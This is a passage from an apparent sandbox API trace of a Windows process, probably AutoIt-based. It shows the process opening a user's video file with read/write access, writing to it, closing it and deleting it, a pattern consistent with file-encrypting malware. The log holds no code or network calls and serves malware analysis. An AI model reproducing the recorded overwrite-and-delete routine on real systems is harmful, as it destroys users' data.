Size=0x8) returned 0x9c2678 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.594] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.594] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.594] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.594] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0194.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.595] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0194.595] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0194.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0194.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0194.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\-4jytdy7dtgq 7n_rha.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0194.596] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0194.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.596] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0194.596] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0194.597] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0194.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd5a0 [0194.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd5a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0194.598] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.598] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0194.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0194.599] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0194.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0194.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0194.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0194.599] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.600] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.600] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0194.600] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0194.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFilePart=0x0) returned 0x50 [0194.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x192f6fa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0x90af58 [0194.600] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\-4jytdy7dtgq 7n_rha.swf")) returned 1 [0194.603] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x192f6fa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0 [0194.603] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0194.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0194.609] TranslateMessage (lpMsg=0x87f36c) returned 0 [0194.609] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0194.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.609] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.610] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0194.610] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0194.610] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) 